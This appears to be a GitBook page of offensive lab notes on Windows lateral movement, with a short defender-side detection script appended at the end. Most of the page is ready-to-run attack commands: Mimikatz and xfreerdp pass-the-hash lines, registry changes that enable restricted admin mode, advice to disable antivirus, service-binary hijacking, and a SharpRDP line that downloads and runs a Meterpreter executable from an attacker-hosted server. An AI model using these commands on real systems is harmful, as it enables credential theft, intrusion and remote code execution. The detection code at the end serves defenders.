# Windows Lateral Movement

## RDP (GUI)

{% hint style="info" %}
If we have gained access to clear text credentials for a domain user and that user is a local administrator of the target machine, we can simply use *mstsc.exe* (the native RDP application) to gain access to that machine.
{% endhint %}

{% hint style="info" %}
When an RDP connection is created, the user's NTLM hash resides in memory for the duration of the session. If we happen to compromise a well-used server (like a *jump server*), we could dump any of those cached credentials as well.
{% endhint %}

{% content-ref url="https://app.gitbook.com/s/uatj6rP1wEwZjNEyJjaB/general/common-operations-tty-ssh-rbash" %}
[Common Operations (tty, SSH, rbash)](https://app.gitbook.com/s/uatj6rP1wEwZjNEyJjaB/general/common-operations-tty-ssh-rbash)
{% endcontent-ref %}

### Turn on SMB2 (for impacket-psexec / cme / nxc)

```powershell
Set-SmbServerConfiguration -EnableSMB2Protocol $true
```

{% hint style="info" %}
Remember to [turn off AV protections](https://osnotes.jackielam.net/osep/attack/evasions) before using *impacket-psexec*.
{% endhint %}

### Connecting to the next victim with an admin NTLM hash

{% hint style="info" %}
Restricted admin mode (disabled by default) allows system administrators to perform a *network login* over RDP, which does not require clear text credentials and does not store them in memory, essentially disabling single sign-on. This type of login is commonly used by service accounts.

While restricted admin mode protects against credential theft on the target, it is now possible to pass the hash when doing lateral movement with mstsc.
{% endhint %}

{% code title="@windows hacked victim" overflow="wrap" %}

```
privilege::debug
sekurlsa::pth /user:admin /domain:corp1 /ntlm:2892D26CDF84D7A70E2EB3B9F05C425E /run:"mstsc.exe /restrictedadmin"
```

{% endcode %}

Clicking *Connect* opens an RDP session on {next victim hostname} as *admin*, achieving lateral movement with the native RDP client in Windows with only the NTLM hash.

{% code title="@kali (when the next victim is reachable)" overflow="wrap" %}

```
xfreerdp /u:admin /pth:2892D26CDF84D7A70E2EB3B9F05C425E /v:192.168.120.6 /cert-ignore
```

{% endcode %}

#### Enable restricted admin mode

1\) Launch a shell instance in the admin user's context

{% code overflow="wrap" %}

```
sekurlsa::pth /user:admin /domain:corp1 /ntlm:2892D26CDF84D7A70E2EB3B9F05C425E /run:powershell
```

{% endcode %}

2\) Open a PowerShell session on the next victim

{% code overflow="wrap" %}

```powershell
Enter-PSSession -ComputerName {next victim hostname}
```

{% endcode %}

{% endcode %}

3\) Create the registry entry and quit the session

{% code title="@next victim" overflow="wrap" %}

```powershell
# DisableRestrictedAdmin = 0 enables restricted admin mode; a missing value or 1 means
# disabled (the default). This is the value defenders should audit, since it is what
# lets mstsc /restrictedadmin accept a hash instead of a password.
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0 -PropertyType DWORD

# leave the remote session
Exit

# alternative way (same value, written with reg.exe)
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v "DisableRestrictedAdmin" /t REG_DWORD /d 0 /f
```

{% endcode %}

## RDP Console

Use SharpRDP to execute a PowerShell download cradle on appsrv01 that pulls the Meterpreter executable and then runs it with stacked commands. First host the shell executable on a web server and set up a listener.

{% code overflow="wrap" %}

```
sharprdp.exe computername=appsrv01 command="powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/met.exe', 'C:\Windows\Tasks\met.exe'); C:\Windows\Tasks\met.exe" username=corp1\dave password=lab
```

{% endcode %}

## Fileless (admin -> SYSTEM)

PsExec authenticates to *SMB* on the target host and accesses the *DCE/RPC* interface. PsExec will use this interface to access the service control manager, create a new service, and execute it. As part of the attack, the binary that is executed by the service is copied to the target host.

We can execute our code without registering a new service by updating the binary path of an existing service and starting the modified service with our target binary. Since we control the service binary, we can use a PowerShell download cradle to avoid saving a file to disk.

{% embed url="https://github.com/Mr-Un1k0d3r/SCShell" %}
SCShell (needs a valid account)
{% endembed %}

{% embed url="https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Fileless%20Lateral%20Movement/Program.cs" %}
PSLessExec
{% endembed %}

{% code overflow="wrap" %}

```
Lat.exe file05/dc02 SensorService "C:\temp\inj.exe"
```

{% endcode %}

*inj.exe*[^1] is the binary the modified service will launch.

If endpoint protections such as application whitelisting are in place, this approach may not be as straightforward and may require a bypass (such as [InstallUtil](https://osnotes.jackielam.net/osep/attack/evasions/application-whitelisting-bypass/powershell-language-mode#clm-bypass-with-custom-runspaces-and-installutil-abuse-to-bypass-applock-rule) or an [XSL transform](https://osnotes.jackielam.net/osep/attack/evasions/application-whitelisting-bypass/applocker-bypass-with-jscript#by-extensible-stylesheet-language-.xsl-through-xls-transformation-xslt)).
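Added here as a defender-side example covering both the SharpRDP cradle in the RDP Console section and the PsExec-versus-SCShell distinction in this section; it is not code from the original notes or from either project. It assumes Sysmon is configured to log process creation (Event ID 1) and registry value sets under the Services key (Event ID 13), that events arrive as dicts carrying the real events' field names, and that all sample events are constructed.

```python
import re

# Indicators of the PowerShell download cradles used on this page (WebClient
# DownloadFile/DownloadString, IEX); extend the list for your own environment.
CRADLE_RE = re.compile(r"(?i)Net\.WebClient|DownloadFile|DownloadString|\bIEX\b|Invoke-Expression")
# Heuristic: directories a legitimately installed service binary normally runs from.
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\program files")

def untrusted_binary(image_path):
    """True when a service ImagePath (possibly quoted, with arguments) is outside TRUSTED_DIRS."""
    return not image_path.lstrip('"').lower().startswith(TRUSTED_DIRS)

def inspect_event(ev):
    """Return an alert string for a simplified System 7045 / Sysmon 13 / Sysmon 1 record, else None."""
    src, eid = ev.get("source"), ev.get("id")
    if src == "System" and eid == 7045:
        # PsExec-style movement registers a brand-new service whose binary was just
        # copied to the host (e.g. into ADMIN$), so it sits outside the usual directories.
        if untrusted_binary(ev.get("ImagePath", "")):
            return f"new service '{ev.get('ServiceName')}' runs from an untrusted path"
    elif src == "Sysmon" and eid == 13:
        # SCShell-style movement installs nothing: it rewrites the ImagePath of an
        # existing service, pointing it at a cradle or at a dropped binary.
        target, value = ev.get("TargetObject", ""), ev.get("Details", "")
        if target.lower().endswith(r"\imagepath") and (
                CRADLE_RE.search(value) or untrusted_binary(value)):
            return f"service ImagePath rewritten: {target}"
    elif src == "Sysmon" and eid == 1:
        # The SharpRDP command on this page runs the cradle as an ordinary process.
        if CRADLE_RE.search(ev.get("CommandLine", "")):
            return f"download cradle executed by {ev.get('Image')}"
    return None

def scan(events):
    """Run inspect_event over a list of events and return the alerts raised."""
    return [alert for alert in map(inspect_event, events) if alert]
# Constructed sample events (not real log data); scan(SAMPLE_EVENTS) raises three alerts.
SAMPLE_EVENTS = [
    {"source": "System", "id": 7045, "ServiceName": "WinRM",
     "ImagePath": r"C:\Windows\System32\svchost.exe -k NetworkService"},
    {"source": "System", "id": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": r"C:\Windows\PSEXESVC.exe"},
    {"source": "Sysmon", "id": 13, "Details": r'"C:\temp\inj.exe"',
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\SensorService\ImagePath"},
    {"source": "Sysmon", "id": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/met.exe', 'C:\\Windows\\Tasks\\met.exe')"},
    {"source": "Sysmon", "id": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]
```

A registry-only ImagePath rewrite produces no 7045 event, which is why the Sysmon 13 rule is the one that catches the fileless variant.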

[^1]: [c-process-injection](https://osnotes.jackielam.net/osep/attack/evasions/c-process-injection "mention")
